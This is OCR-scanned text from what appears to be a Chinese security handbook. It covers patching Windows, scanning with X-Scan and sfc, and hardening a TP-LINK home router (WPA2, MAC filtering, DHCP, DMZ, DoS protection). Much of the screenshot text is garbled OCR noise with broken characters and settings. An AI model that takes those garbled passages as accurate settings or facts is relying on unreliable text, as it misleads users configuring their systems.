[step 图 打开 “设置 ”窗口 ， 可 以 看 到 有 关系 
统 设置 的 相关 功能 ， 如 下 图 所 示 。 
兰 
县 0 
内 个 此 白 
ns 
step 图 单 去 “更 新 和 安全 ”图 标 ， 打 开 “ 更 


新 和 安全 ”窗口 ， 选 择 “Windows 更 新 ” 选 
项 ， 如 下 图 所 示 。 
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< 证 和 


过。 更 有 安全 ES 
= Vo sy 
Windows Defender 


《Fi 各 已 安 条 吕 新 的 更 新 。 上 次 检查 时 间 ; 证 天 10:42 
各 从 


座 查 天 
废 各 
株 下 载 着 自动 安装 可 有 于 新 。 
汉 二 
正 年关 扩 有 关 果 新 更 新 的 信息 局 
堵 对 开发 人 员 了 基本 信忠 
局 选 而 


单 击 “ 检 查 更 新 ”按钮 ， 即 可 开始 检 
查 网 上 是 否 存在 更 新 文件 ， 如 下 图 所 示 。 


< 二 x 
Re [2 
Es 
Windows Deferder 
正在 性 豆 更 新 - 
备份 
户 复 正在 音 找 有 关 示 新 更 新 的 信息 号 7 
了 山 更 多 信息 
大 由 筑 雹 
针对 开发 人 员 


[Bee 国 检查 完毕 后 ， 如 果 存 在 更 新 文件 ， 则 
会 弹出 下 图 所 示 的 信息 提示 ， 提 示 用 户 有 
可 用 更 新 ， 并 自动 开始 下 载 更 新 文件 。 


党 wINpows 更 新 


Windows 更 新 


有 可 用 更 新 。 
“* 运用 于 Windows 10 Version 1511 的 累积 本 新 (KB3124262). 


详细 信息 


正在 准备 安装 更 新 70%6 


正在 查 乒 有 关 最 新 更 新 的 信息 玛 ? 
了 钥 更 多 信息 


高 加 选项 


step[ 四 下 载 完毕 后 ， 系 统 会 自动 安装 更 新 文 
和 安装 完毕 后 ， 会 弹出 下 图 所 示 的 信息 
提示 框 。 


+ 三 i 


入 wiNoows a 

已 为 你 安排 了 一 次 重启 

0， 竹林 以 下 条 ,由 可. 和 i 在 下， 
内 全 下 安富 

©® EE 0 FA 


© WE 
a 


me 


正 攻击 有 半 好 新 更 新 的 信 呈 中 1 
TMS 


单 击 “ 立 即 重新 启动 ”按钮 ， 即 重新 
et 重新 启动 完毕 后 ， 再 次 打开 
“Windows 更 新 ”窗口 ， 在 其 中 可 以 看 到 
“你 的 设备 已 安装 最 新 的 更 新 …… ”信息 
提示 ， 如 下 图 所 示 。 


+ 姓 a 


各 更 HI 全 EE ] 


os 


ei Poti 人 和 公务 已 安 半 慑 新 约见 入 ， 上 次 位 机 时 间 : 今天 
1607 


备份 
信 揽 检查 新 
ME 插 下 眶 并 自动 区 可 用 更 新 
针对 开 发 人 员 正在 可 抠 有 关 全 晰 更 条 的 人 局 鸭 ) 
了 更 多 他 忆 
A 


[ep 图 单 击 “ 高 级 选项 ”按钮 ， 打 开 “ 高 级 

选项 ”设置 工作 界面 ， ee 
新 的 安装 方式 ， 如 下 图 所 示 。 

本 到 


请 选择 安装 更 新 的 方式 


OM 失重 新 启动 | 
aplriutroTree 了 我 们 在 你 未 便 用 设备 时 自动 得 新 月 动 设备。 更 新 皖 不 全 甫 过 过 所 号 计 丰 的 
i 


口 王 Windows 时 提供 共 他 Microsoft 产品 的 更 新 


口 


拉 B 升 豚 
了 了 许 届 信息 
二 mm 四 史 jc 好 
选择 如 何 提供 更 新 


获取 Insider Preview 版 本 


压 为 第 一 此 能 查 厂 Windows 的 后 等 新 和 改进 半径 供 反 管 的 人 员 之 一 
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12.6.2 为 系统 漏洞 打 补丁 


除 使 用 Windows 系 统 自 带 的 Windows Up- 
date 下 载 并 及 时 为 系统 修复 漏洞 外 ， 还 可 以 使 
用 第 三 方 软件 及 时 为 系统 下 载 并 安装 漏洞 补 
丁 ， 常 用 的 有 360 安 全 卫士 、 优 化 大 师 等 。 

使 用 360 安 全 卫士 修复 系统 漏洞 的 具体 
操作 步骤 如 下 。 

[step 图 双击 桌面 上 “360 安 全 卫士 ”图 标 ， 
打开 “360 安 全 卫士 ”， 如 下 图 所 示 。 


各 已 11 天 没有 体检 , 建议 立即 体检 | 


日 日 多 


有 单 击 “ 系 统 修 复 ” 按 钮 ， 进 入 下 图 所 
i 训 二 攻 字 ， 


[step 图 单 去 “全 面 修复 ”按钮 ，360 安 全 卫 
士 开始 自动 扫描 系统 中 存在 的 漏洞 ， 并 在 
下 面 的 界面 中 显示 出 来 ， 用 户 在 其 中 可 以 
自主 选择 需要 修复 的 漏洞 ， 如 下 图 所 示 。 

Ps 站 二 
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Estee 加 单 去 “一 键 修复 ”按钮 ， 开 始 修复 系 
统 存在 的 漏洞 ， 如 下 图 所 示 。 


step 园 修复 完成 后 ， 则 系统 漏洞 的 状态 变 为 
“已 修复 ”， 如 下 图 所 示 。 


© 漏 汪 侯 外 处 理 中 .。 - 


月 map 


ne 


12.7 ”实战 演练 


实战 演练 1 一 一 使 用 X-Scan 扫 描 系统 
漏洞 

X-Scan 是 国内 最 著名 的 综合 扫描 器 之 
一 ， 它 可 以 扫描 出 操作 系统 类 型 及 版 本 、 
标准 端口 状态 及 端口 BANNER 信 息 、CGI 漏 
洞 、IS 漏 洞 、RPC 漏 洞 等 信息 。 

扫描 系统 漏洞 的 操作 步骤 如 下 : 
[step 图 在 “X-Scan v3.3 GUI” 主 窗口 中 单 
击 开始 扫描 图 标 获 ， 即 可 进行 扫描 。 在 扫 
描 的 同时 显示 扫描 进程 和 扫描 所 得 到 的 信 
息 ， 如 下 图 所 示 。 
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痊 Xx-scan v33 GUI 一 Oo x 
4M SEW SE% IRV laroiege wn 
@@l 盟国 | 蝇 | 国 | = 


EE ee a EE ES 
acealkest EE 了 正在 艇 别 开 反 服 务 


普通 信息 | 顺和 证 | 桩 误 信 息 | 


ee 


人 


Ee rs 


TIE 


Eee 图 在 扫描 完成 之 后 ， 即 可 看 到 HTML 格 
式 的 扫描 报告 。 在 其 中 既 可 看 到 活动 主机 卫 
地 址 、 存 在 的 系统 漏洞 和 其 他 安全 隐患 ， 还 
可 看 到 安全 隐患 的 解决 方案 ， 如 下 图 所 示 。 


- 0 x 
总 r/REmAN Ts D - C| Bx sean Reper 图 
Ee EE 2 Scan 析 到 所 ~ 
TT TT ER 
2 到 拓 
ed 
ee 
en 
EE 
= i 手机 
主机 从 到 结果 
aa 和 
[Ee 
主 生 地 由 强 Q/ 医 芝 [LI 
re 3 
全 后 漳 肥 角 实 万 安 : localhost 
于 到 沪 口 /时 芳 。。。 安全 所 和 及 所 志方 过 
Treee 天 
Ce) 
ooh dr Ba TE Ter. 
Nessus-ID + 10700 v 


在 “X-Scan v3.3 GUI” 主 窗口 中 切换 
到 “漏洞 信息 ”选项 卡 下 ， 即 可 看 到 存在 
漏洞 的 主机 信息 ， 如 下 图 所 示 。 


鸭 X-Scanv33GUI i 
文中 Vi 讼 团 (W) 吉大 XW) 工具 Y) language 帮 支 7) 

@[ | 加 | 国 吉 | 加 
[SEE 


Tealhest 1 二 


正在 伐 别 开交 服务 


苦 通 信息 局 河 坟 外 | 措 误 伟 息 | 


[TI De 

ocalhost| 135/tp 
乔 城 服 委 445/top 
/te — nt 


ocalhost| 
localhost| eroscft-ds "服务 可 能 运行 于 说 江口 


/A ho re Tid Currertiia um rec 3 2 


实战 演练 2 一 一 使 用 命令 扫描 并 修复 系统 


SFC 命 令 是 Windows 操 作 系 统 中 使 用 频 
率 比 较 高 的 命令 ， 主 要 作用 是 扫描 所 有 受 
保护 的 系统 文件 并 完成 修复 工作 。 该 命令 
的 语法 格式 如 下 : 

SEC [/SCANNOW] [/SCRNONCE] [/ 


SCANBOOT] [/REVERT] [/PURGECACHE] [/ 
CACHESIZE=x] 


各 个 参数 的 含义 如 下 : 

e /SCANNOW: 立即 扫描 所 有 受 保护 
的 系统 文件 。 

e /SCANONCE: 下 次 启动 时 扫描 所 
有 受 保护 的 系统 文件 。 

e /SCANBOOT: 每 次 启动 时 扫描 所 
有 受 保护 的 系统 文件 。 

e@ /REVERT: 将 扫描 返回 到 默认 设置 。 

e /PURGECACHE: 清除 文件 缓存 。 

e /CACHESIZE=x: 设置 文件 缓存 
大 zs 

下 面 以 最 常用 的 sfc/scannow 为 例 进行 


讲解 。 具 体操 作 步 又 如 下 : 

[step 图 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “命令 提示 符 ( 管 理 员 ) ”菜单 
命令 ， 如 下 图 所 示 。 


[seep 固 弹出 “管理 员 : 命令 提示 符 ” 窗 口 ， 
输入 命令 sfc/scannow， 按 Enter 键 确认 ， 如 
下 图 所 示 。 


第 12 章 无 线 网 络 中 主机 漏洞 的 安全 防护 Eee 


step 图 开始 自动 扫描 系统 ， 并 显示 扫描 的 进 


度 ， 如 下 图 所 示 。 


国人- fe /acamew 


step 图 在 扫描 的 过 程 中 ， 如 果 发 现 损坏 的 系 


统 文件 ， 会 自动 进行 修复 操作 ， 并 显示 修 
复 后 的 信息 ， 如 下 图 所 示 。 


12.8 小 试 身 手 


练习 1: 
练习 2: 
练习 3: 
练习 4: 


使 用 Nmap 工 具 扫描 漏洞 。 
使 用 OpenVAS 工 具 扫 描 漏洞 。 
使 用 Nessus 工 具 扫 描 漏洞 。 
系统 漏洞 的 安全 防护 。 
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第 13 章 ”加 固 无 线 网 络 的 大 门 


在 无 线 网 络 中 ， 能 够 发 送 与 接收 信和 号 的 重要 设备 就 是 无 线路 由 器 了 ， 因 此 ， 对 无 
线路 由 器 的 安全 防护 ， 就 等 于 看 紧 无 线 网 络 的 大 门 。 本 章 介绍 无 线路 由 器 的 安全 防护 策 
略 ， 主 要 包括 无 线路 由 器 的 基本 设置 、 无 线路 由 器 的 安全 策略 以 及 无 线路 由 安全 管理 工 


具 等 。 


风 13.1 无 线路 由 器 的 基本 设置 


无 线路 由 器 相信 大 家 都 不 陌生 ， 但 是 
懂得 如 何 设置 的 却 不 多 。 本 节 针 对 家 用 无 
线路 由 器 的 设置 进行 讲解 。 


13.1.1 通过 设置 向 导 快速 上 网 


目前 多 数 家 用 无 线路 由 器 都 提供 了 
网 页 进入 页 面 ， 当 用 户 登 录 路 由 后 会 提供 
一 个 向 导 ， 通 过 向 导 设 置 可 以 最 快 地 实现 
连接 外 网 。 家 用 路 由 器 背面 会 有 路 由 器 型 
号 、 路 由 器 IP〈 进 入 路 由 的 地 址 )、 管 理 员 
账号 及 密码 等 信息 ， 如 下 图 所 示 。 


TP-LINK 


通过 向 导 设置 路 由 器 并 进行 上 网 的 具 
体操 作 步 又 如 下 : 
[step 图 打开 IE 浏 览 器 ， 在 地 址 栏 中 输入 路 由 
器 的 网 址 ， 一 般 情 况 下 路 由 器 的 默认 网 址 
为 192.168.0.1， 输 入 完成 后 单 击 “ 转 至 ” 按 
钮 ， 即 可 打开 路 由 器 的 登录 窗口 ， 如 下 图 
所 示 。 


© | we 女 | 三 久 O…… 
TP-LINK 

青 输 入 管理 只 密码 

忘记 事 取 ? 


step 图 在 “请 输入 管理 员 密码 ”文本 框 中 给 
入 管理 员 的 密码 ， 默 认 情 况 下 管理 员 的 密 
码 为 123456， 如 下 图 所 示 。 


[= x 癌 


万 口 六 | 三 必 丰 径 


TP-LINK 


| ean) 


青 输 入 管理 员 密 妈 


[step 图 单 去 “确认 ”按钮 ， 即 可 进入 路 由 器 
的 “运行 状态 ”工作 界面 ， 在 其 中 可 以 查 
看 路 由 器 的 基本 信息 ， 如 下 图 所 示 。 


© Tiwiaasy x* 故 


sm 
| 六 | 三 


TP-LINK 


rm 
Ts 
0 


step 贺 选择 “设置 向 导 ” 选 项 ， 即 可 进入 
“设置 向 导 ” 对 话 框 ， 如 下 图 所 示 。 


本 人 向 导 可 设置 上 网 所 需 的 基本 网 络 基 赤 ， 请 单 击 “ 下 一 步 ”继续 。 知 要 详细 设 
置 某 项 功能 或 参 训 ， 请 点 击 左 侧 相 关 栏 目 。 


下 - 步 


[step 图 单 去 “下 一 步 ” 按 钮 ， 进 入 “设置 向 
导 - 上 网 方式 ”对 话 框 ， 在 其 中 选择 上 网 方 
式 。 其 中 PPPoE 为 拨号 上 网 ， 一 般 由 运营 商 
提供 具体 账号 、 密 码 ， 动 态 I[P 和 静态 IP 则 多 
为 分 网 时 使 用 ， 可 以 根据 实际 需求 选择 ， 
如 下 图 所 示 。 


本 向 号 提供 三 种 最 常见 的 上 网 方式 供 选 择 。 若 为 其 它 上 网 方式 ,， 请 点 击 左 便 “网 
络 希 数 ” 中 “WAN 品 设置 ”进行 设置 。 如 果 不 青 楚 使 用 何 种 上 网 方式 ， 请 选择 “让 
路 由 器 自动 选择 上 网 方式 ”。 
轩 让 路由 器 自动 选择 上 网 方式 (推荐 ) 
PPPoE (ADSL 虚 拟 拨 号 )》 
动态 IP 《以太 网 宽带 ， 自 动 从 网 络 服务 商 获取 ?地 址 ) 
静态 IP 以 太 网 宽带 ,网络 服务 商 提 供 固 定 I 地 址 ) 


有 


开元 | 


[step 园 单 击 “下 一 步 ” 按 钮 ， 进 入 “设置 
向 导 - 无 线 设置 ”对 话 框 ， 在 其 中 设置 路 
由 器 无 线 网 络 的 基本 参数 以 及 无 线 安全 
选项 ，“ 无 线 安 全 选项 ”可 以 采用 WPA- 
PSK/WPA2-PSK 方 式 输入 密码 ， 如 下 图 
所 示 。 


i > i 
第 13 章 “加固 无 线 网 络 的 大 门 ES 

无 线 杖 态 : 开启 ， 
ssm: TP-LUNK_012F08 
信道 : 自动 
模式 : 11bgn mixed v 
矣 自 珊 宽 : 自动 " 
无 线 安 全 选项 : 
为 健 障 网 络 云 全， 强烈 推 荐 开启 无 线 安全 ， 并 使 用 WPA-PSK/WPA2-FSK AES 加 密 广 
式 。 

不 开启 无 线 安全 

二。 WPA-PSKAWPA2-TSK 
PSKED: 
《6-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字符 》 
不 修 必 无 线 安全 设置 
上 - 步 |] [下 - 步 


侈 注意 : 无 线 密码 长 度 不 能 小 于 8， 否 则 会 
有 提示 ， 如 下 图 所 示 。 


192.168.1.1 显示 : 


0 PSK 客 码 长 度 不 能 小 于 8， 请 重新 输入 ! 


村 止 此 页 再 显示 对 话 框 。 


确定 


单 击 “ 下 一 步 ”按钮 ， 即 可 完成 向 导 
设置 ， 并 弹出 下 图 所 示 的 对 话 框 。 
[EE 

设置 完成 ， 单 击 “重启 ”后 路由 器 将 重启 以 使 设置 生效 。 


提示 : 若 路 由 器 重启 后 仍 不 能 正常 上 网 ， 请 点 击 左 他 “网 络 务 孝 " 进 
入 “WA 设置" 栏目， 确认 是 否 设置 了 正确 ByWAT 口 连接 类 型 和 恢 号 模式 * 


二 到 | 证 
[step 图 单 去 “重启 ”按钮 ， 重 启 路 由 器 ， 如 


下 图 所 示 。 等 待 路 由 器 重启 完成 后 ， 就 可 
以 进行 上 网 了 。 


配置 保存 成 功 : 


正在 重新 启动 
= 
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13.1.2 ”状态 查看 及 QSS 安 全 设置 


设置 好 路 由 器 以 后 ， 重 启 路 由 器 并 重 
新 进入 路 由 ， 此 时 可 以 查看 路 由 器 的 运行 
状态 ， 路 由 状态 给 出 了 路 由 器 运行 时 的 一 
些 简 要 信息 。 在 路 由 的 左 侧 功能 列表 中 选 
择 “ 运 行 状态 ”选项 ， 在 打开 的 界面 中 可 
以 查看 路 由 器 的 状态 ， 主 要 包括 以 下 几 个 
信息 。 

(1) 版 本 信息 。 列 出 了 路 由 器 的 当前 
软件 版 本 及 硬件 版 本 信息 ， 如 下 图 所 示 。 
CE 


当前 软件 版 本 : 
当前 宰 件 版 本 : 


4.19.18 Build 130123 Rel 32879n 
WBEAASN 2.0 00000000 


CE 


摘 收 发 送 
字 节 教 : o 9456 
教 据 包 雪 : 0 115 


在 路 由 功能 列表 中 选择 “QSS 安 全 设 
置 ”选项 ， 即 可 进入 “QSS 安 全 设置 ” 界 
面 。 在 其 中 可 以 对 路 由 器 的 QSS 功 能 进行 安 
全 设置 ， 如 下 图 所 示 。 


CE 


55 功 能 : 已 开启 关闭 0SS 
当前 Pn69: 35169957 [本 本 轴 PN [天 ER 
添加 新 设备 : 添加 设备 
| 别 | 


(2) LAN 口 状态 。 会 有 连 入 路 由 的 设 
备 MAC 地 址 、 卫 地 址 、 子 网 掩 码 等 信息 ， 
如 下 图 所 示 。 
JWC 地 址 ; 


本 地 址 : 
子 网 撞 码 : 


1C-PA-68-01-27-08 
192.168.1.1 
255. 255. 255. 0 


(3) 无 线 状态 。 会 有 此 路 由 配置 的 无 
线 信息 ， 其 中 包括 SSID 号 、 信 道 、 模 式 、 
MAC 地 址 等 信息 ， 如 下 图 所 示 。 

ER 


无 线 功能 ; 启用 


SSII 呈 : TP-LINK_ O12708 
信道 : 自动 (当前 信道 1) 
模式 : liben nixed 

顷 段 带宽 : 自动 

JEAC 地 址 ; 1C-FA-68-01-2F-08 
Ds 状态: 未 开启 


(4)WAN 口 状态 。 显 示 外 网 连接 情况 。 
如 果 路 由 器 无 法 正常 上 网 可 以 查看 此 处 ， 
排查 故障 ， 如 下 图 所 示 。 


JUAC 地 址 1C-PA-66-01-2F-09 

王 地 址 : 0.0.0.0 动态 IP 

子 网 樟 码 : 0.0.00 

网 关 : 0.0.0.0 AN 品 未 连接 ! 
DRS 服务 器 : 0.0.0.0, 0.0.0.0 


(5) WAN 口 流量 统计 。 这 里 负责 统计 
上 网 流量 信息 ， 如 果 网 络 异 常数 据 量 过 大 
可 以 查看 这 里 的 信息 ， 如 下 图 所 示 。 


246 


侈 提示 : QSS， 即 服务 质量 ， 是 网 络 安全 
机 制 的 一 种 ， 是 通过 给 局 域 网 中 的 应 用 、 
端口 或 计算 机 设 定 优先 次 序 ， 从 而 解决 网 
络 延 迟 和 阻塞 等 问题 的 一 种 技术 。 在 正常 
情况 下 ， 如 果 网 络 只 用 于 特定 的 、 无 时 间 
限制 的 应 用 系统 ， 并 不 需要 QSS， 但 是 对 关 
键 应 用 和 多 媒体 应 用 就 十 分 必要 。 当 网 络 
超载 或 拥塞 时 ，QSS 能 确保 重要 业务 不 受 延 
迟 或 丢 齐 ， 同 时 保证 网 络 的 高 效 运行 。 


13.1.3 ”网 络 参数 与 无 线 设置 


路 由 一 般 提供 网 络 参 数 设 置 ， 其 中 包 
括 外 网 设置 、 内 网 设置 、MAC 地 址 复制 ， 
同时 无 线路 由 器 还 提供 无 线 设置 ， 如 下 图 
所 示 。 


网 络 参数 与 无 线 设置 的 操作 步骤 如 下 : 
[step 图 WAN 口 设置 ， 主 要 包括 WAN 口 连接 
类 型 ， 与 向 导 设 置 中 的 3 种 类 型 相同 ， 如 有 
特殊 需要 可 以 设置 DNS 服务 器 ， 否 则 保持 
默认 即 可 ， 如 下 图 所 示 。 


WAN 口 连接 类 型 : 动态 Pv] [自动 必 到 
严 地 址 : 0.0.0.0 
子 阿拉 中 : 0.0.0.0 
网 关 : 0.0.0.0 
更 新 LE WAED 未 连接 ! 
数据 即 mv( 字 节 ); [1500 (点 认 是 1500， 如 丰 必 要 ， 请 和 修改 ) 


」 手动 设置 nys 服 务 器 
DRS 服 务 器 : 0000 
备用 DIS 服务 器 : 。 [D000 (可 选 ) 
主机 名 : WR845N 


单方 式 亲 取 TP 《一般 情 吕 下 请 急 寺 择 ) 
区 


[step 图 LAN 口 设置 ， 主 要 通过 子 网 掩 码 的 设 
置 划分 内 网 网 段 ， 子 网 掩 码 的 设置 决定 了 
内 网 网 段 ， 同 时 也 确定 了 内 网 最 大 容纳 设 
备 数 量 ， 如 下 图 所 示 。 


LAND 讼 交 


| 


本 页 设置 LMJ 口 的 基本 网 络 参数 。 
JWC 地 址 : 1C-PA-68-01-27-08 
下 地 址 : 192168.11 
子 网 摘 码 ; 255 .255 2550 v 
| 
保存 | [帮助 


MAC 地 址 复制 ， 可 以 对 路 由 器 MAC 
地 址 进行 复制 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 对 广 域 Rb3UAC 地 址 * 
JEAC 地 址 : 00-87-36-2F-D0-46 眉 午 出 六 MAC 
当前 管理 Phpuc 地 址 : 。 [D087-352FD046 MACE 
注意 : 只 有 局 域 网 中 的 计算 机 才能 使 用 本 功能 。 
[ 侵 存 | [ 吉 助 | 


[step 图 无 线 网 络 基本 设置 ， 包 括 SSID (网 络 
名 称 ) 号 的 设置 、 信 道 设置 、 通 信 模 式 以 
及 频段 带宽 等 参数 ， 如 下 图 所 示 。 


本 页 面 设置 路 由 器 无线 癌 络 的 基本 多 数 。 
SsIDS: TP-LINK_012F08 
信道 : 自动 
模式 : 1bgn mixed 9 
频 向 离 : 。 [自动 了 
加 开 让 无线 9 能 
加 开 自 ssrnr 播 
开店 ms 
EE [项 本 | 


step 国 无 线 网 络 安 全 设置 ， 和 包括 4 种 方式 ， 
第 1 种 不 开启 无 线 安全 ， 这 种 方式 除 测试 


第 13 章 ”加 固 无 线 网 络 的 大 门 ES 


外 不 建议 使 用 ; 第 2 种 方式 使 用 WPA-PSK/ 
WPA2-PSK 方 式 ， 一 般 建 议 使 用 这 种 方式 ， 
目前 是 比较 主流 的 网 络 安 全 方式 ; 第 3 种 方 
式 是 WPA/WPA2 方 式 ， 这 种 方式 同 第 2 种 方 
式 类 似 ， 只 是 加 密 方式 为 自 定义 ; 第 4 种 方 
式 使 用 WEP 方 式 ， 该 方式 已 经 被 曝 出 存在 
严重 安全 隐患 ， 除 测试 外 不 建议 使 用 ， 如 
下 图 所 示 。 


设置 路 由 证 造 硕 * 
安全 提示 : 为 保障 网 络 安全 ， 强 到 推荐 开启 安全 设置 ， 并 使 用 好 人 
法 。 


不 开启 无 线 安全 
WPA-PSE/NPAZ-FPSK 
认证 类 型 ; 自动 2 
加 于 莽 法: AES 
PSKED: 123456789 
《6-63 个 ASCII 码 字符 或 6-64 个 十 六 进 制 字 符 ) 
和 565400 


(单位 为 秒 ， 最 小 秆 为 30， 不 更 新 II 为 0) 


MI 
认证 类 型 : 自动 ， 
加 密 法 : 生动， 
Readins 最 务 器 IF: 
Radius 庙 口 : 1812 《1- 65535， 0 表示 默认 端口 : 1812) 
Badius 宝 码 : 
组 密 锡 更 新 周期 。 [86400 

《单位 为 种 ， 最 小 值 为 20， 不 更 新 ml 为 0) 

WEP 
认证 类 型 : 自动 
EP 密 角 格式: 十 六 进 制 
密 角 选择 EF 密 钥 密 角 类 型 
E23. [ EE 
于 钥 2: 本 用 
密 胃 3: 类 用 
定 钥 4: 医用 

[保存 ] [村 助 


[sep 图 无 线 网 络 MAC 地 址 过 滤 设 置 ， 如 果 开 
启 MAC 地 址 过 滤 ， 只 有 添加 进来 的 MAC 设 
备 可 以 正常 通信 ， 列 表 之 外 的 设备 无 法 进行 
通信 ， 这 个 只 是 相对 的 ， 后 面 会 讲解 如 果 通 
过 MAC 复 制 实现 通信 ， 如 下 图 所 示 。 


本 页 设置 WC 地 圳 过 小 未 控制 计算 机 对 本 无 线 网 给 的 访问 = 


JEC 地 址 过 小 功能 : 已 关闭 


局 用 过 天 


过 各 抽风 
查 。 草 止 列表 中 生效 pc 地 址 访问 本 无 线 网 络 
元 许 列表 中 生 益 和 pc 地 址 访问 本 无 线 R 纤 


吾 ww | We T EE EE 
添加 新 条 目 蚤 有 条 目 王 效 攻 有 条 目 失 郊 骆 际 折 有 亲自 
= 下 = 页 | [者 外 
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SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


[step 图 无线 高 级 设置 ， 其 中 有 Beacon 帧 广播 
间隔 时 间 ， 移 动 设 备 通过 Beacon 帧 检测 空 
间 中 存在 的 无 线路 由 ， 通 过 设置 Beacon 帧 
可 以 达到 隐藏 无 线路 由 的 效果 ， 如 下 图 所 
示 。 当 然 ， 隐 藏 无 线路 由 也 是 相对 的 。 后 
面 会 讲解 如 何 挖 出 隐藏 的 无 线路 由 。 


Bescon 时 模 100 (40-1000) 

BRTS 时 本 : 2346 0-2346) 不 丰 设 辕 0WT 了 时 务 尖 83 驻 态 地 直 分 厌 们 对 。 

分 片 而 自 : (25E-2348) 

pr 0 Ce 注意 : 添加 ， 册 条 目 红 已 有 杀 忆 做 生 何 更 阔 ， 素 重 户 二 设备 后 才能 生效 
网 开启 wm [male wt | twit | 基态 | 二 和 ] 
团 开启 shert 红 ES CIT 

dss [EE 
保存 | [ 需 


功 | 宪 户 注 名 THC 的 让 ET | 
TDTREEIEIET P48: 


| Ei 


step 图 静态 地 址 分 配 ， 从 这 里 可 以 对 客户 端 
IP 地 址 进行 静态 分 配 ， 通 过 静态 分 配 设置 将 
不 再 通过 DHCP 动 态 分 配 ， 如 下 图 所 示 。 


13.1.4 ”DHCP 与 转发 规则 


DHCP 服 务 是 给 内 部 网 络 或 网 络 服务 供 
应 商 自动 分 配 IP 地 址 ， 给 用 户 或 者 内 部 网 络 
管理 员 作为 对 所 有 计算 机 做 中 央 管 理 的 手 
段 。 转 发 规则 是 内 网 与 外 网 的 一 个 映射 过 
程 ， 如 下 图 所 示 。 


* 静态 地 址 分 配 
设置 DHCP 与 转发 规则 的 操作 步 台 
如 下 : 
step 图 DHCP 服 务 ， 这 里 可 以 设置 地 址 池 的 
开始 与 结束 位 置 ， 还 可 以 设置 地 址 使 用 时 
间 、 网 关 、DNS 服 务 器 等 ， 如 下 图 所 示 。 


本 玉 由 只 内 定 的 Dhcr 朋 务 革 能 自动 叶 局 央 问 中 香 计算 tn6TzF/Er 坊 议 * 
hz 服务 器 : 不 启用 国 户 用 
地 址 地 开始 地 址 [93158160 
地 址 地 结束 地 址 [Ta 155605 
地 址 和 其: 30 一 了] 分钟 1 一 20e0 人 名， 缺 和 为 120 分 负 》 
网 闪 : 0000 (可 连 ) 
证 红 各: (可 达 ) 
主 Is 骨 务 器 : [OO 《( 梧 先 ) 
苗 用 DIE 服务 器 : 。 [000 《( 梧 先 ) 
EE3 硬 ED 


[step 图 客户 端 列表 ， 这 里 可 以 显示 出 连接 路 
由 器 的 客户 端 ， 其 中 包括 客户 端的 名 称 、 
MAC 地 址 、IP 地 址 以 及 登录 时 间 。 遇 有 网 
络 故障 可 以 从 这 个 列表 排查 可 疑 客 户 端 ， 
如 下 图 所 示 。 
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虚拟 服务 器 ， 虚 拟 服务 器 定义 了 广 域 
网 服务 端口 和 局 域 网 网 络 服务 器 之 间 的 映 
射 关 系 ， 所 有 对 该 广域网 服务 端口 的 访问 
将 会 被 重 定位 给 通过 IP 地 址 指定 的 局 域 网 网 
络 服务 器 ， 如 下 图 所 示 。 


虚 挫 服务 器 定义 了 | Ri mene ne meet 基于 读 广 十 本 
阳 务 诗 吕 的 访问 将 全 衬 生 定位 结 请 过 IT 池 直 指定 的 届 朵 且 络 办 务 器 


卫 N22] Er Wm | 
Be] 内 厅 有 生日 
_ 本 殉 [| [而 玉 
[step 图 特殊 应 用 程序 ， 某 些 程序 需要 多 条 链 
接 ， 如 Internet 游 戏 、 视 频 会 议 、 网 络 电话 
等 。 由 于 防火 墙 的 存在 ， 这 些 程序 无 法 在 
简单 的 NAT 路 由 下 工作 。 设 定 转发 规则 给 
特殊 应 用 程序 实现 NAT 地 址 转换 ， 如 下 图 
所 示 。 


[EE 


[RE 


村 上 程 序 营 要 多 条 谤 接 ， 如 Teterret 游 戏 ， 视频 会 议 ,网络 忆 话 等 < 由 于 防火 增 鸣 存在 ,这 
此 得 序 天 法 在 简单 3 和 YAT 稿 宣 下 工作 。 持 丈 商 用 程序 犊 得 某 些 这 样 的 宙 用 潮 序 除 腑 在 WAT 骆 
四 下 工作 * 

回 医 二 志 哥 种 放 办 议 ED 司 开 训 协 说 状 恋 | 微星 
EE 


[step 国 DMZ 主 机 ， 在 某 些 特殊 情况 下 ， 需 
要 让 局 域 网 中 的 一 台 计 算 机 完全 暴露 给 广 
域 网 ， 以 实现 双向 通信 ， 此 时 可 以 把 该 计 
算 机 设置 为 DMZ 主 机 ， 如 下 图 所 示 。 


在 某 些 特殊 情况 下 ， 委 委 让 局 坦 本 中 的 一 台 计 算 机 完全 景 雷 给 广域网 ， 以 实 
现 观 后 盘 信 ， 此 8 后 ] 以 把 该 计算 机 设置 大 mm 主机。 


可 拒 $: 了 自用。 国 不 启用 


WE 主机 IT 地 址 : [0.0.0.0 
保存 帮助 


ESesE UPnP 设 置 ，UPnP 的 应 用 范围 非常 
广 ， 以 致 足够 可 以 实现 许多 现成 的 、 新 的 
及 令 人 兴奋 的 方案 ， 包 括 家 庭 自 动 化 、 打 
印 、 图 片 处 理 、 厨 房 设备 、 汽 车 网 络 和 公 
共 集 会 场所 的 类 似 网 络 等 ， 如 下 图 所 示 。 


二 而 /PrN 人。 
ur FS [到] 


ml ERR | MRR 


ET 


13.1.5 ”安全 设置 与 家 长 控制 

安全 设置 针对 一 些 可 能 遭受 的 网 络 攻击 
进行 防御 ， 家 长 控制 则 可 以 控制 未 成 年 人 浏 
览 固定 网 页 以 及 上 网 时 间 ， 如 下 图 所 示 。 


进行 安全 设置 与 家 长 控制 的 操作 步骤 
如 下 : 
在 路 由 功能 列表 中 选择 0 加 
项 下 的 “高 级 安全 设置 ”选项 ， 进 入 “ 
ns 
设置 并 阅读 相关 注意 事项 ， 如 下 图 所 示 。 
[sai | 


本 而 设 轩 可 直人 村 | 


注意 ; 上 只 有 启用 了 “DoS 丰 击 防 手 ” A 
、 这 里 “数据 | 


替 据 包 统 计时 间 间 隔 : 《5~60》 107] 种 


Ds 区 击 防 范 : 不 启用 号 启用 

开启 TP-FL000 区 击 过 源 : 

TomP-Finnn 才 所 和 六 值 : (5~360) [50 得 种 

开启 InE-ILD00 过 源 : 

mp-Fu0o 雪 提包 坟 值 : (5~3600) 。 [SO0 包 /各 

开启 TcP-eIFeLD0D 攻 击 过 开 : 

TCP-STDNFTL000 数 据 包 圾 值 : 15~3600) [50 也/ 和 

到 则 亲自 YANDB9Fing: 

本 止 来 目 LAND 的 Fing 昌 通过 路 由 者: 《防范 可 击 下 六 要 ) 
